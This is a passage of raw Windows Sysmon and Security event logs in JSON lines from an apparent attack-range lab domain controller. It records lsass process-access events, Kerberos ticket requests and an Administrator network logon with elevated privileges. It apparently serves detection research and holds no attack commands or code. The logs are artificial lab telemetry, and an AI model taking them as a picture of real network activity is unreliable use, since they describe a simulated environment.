{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2628,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:48.438\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:48.438","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2629,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:48.438\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:48.438","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220372,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x48E1B\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x48e1b","LogonType":"3","EventReceivedTime":"2020-08-01 07:53:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2630,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:48.454\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:48.454","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220373,"ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-2231640892-1842410504-3836505531-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 07:53:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220374,"ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{E50135F7-BF80-2E10-0465-5DE964C29E4C}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-6178966$\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-6178966$","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{E50135F7-BF80-2E10-0465-5DE964C29E4C}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 07:53:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220375,"ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{E50135F7-BF80-2E10-0465-5DE964C29E4C}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x520\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{E50135F7-BF80-2E10-0465-5DE964C29E4C}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 07:53:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220376,"ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x48E3C\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{E50135F7-BF80-2E10-0465-5DE964C29E4C}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x520\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-6178966\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x48e3c","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-6178966","LogonGuid":"{E50135F7-BF80-2E10-0465-5DE964C29E4C}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 07:53:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220377,"ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x48E3C\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x48e3c","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 07:53:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2631,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:48.454\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:48.454","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2632,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:48.454\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 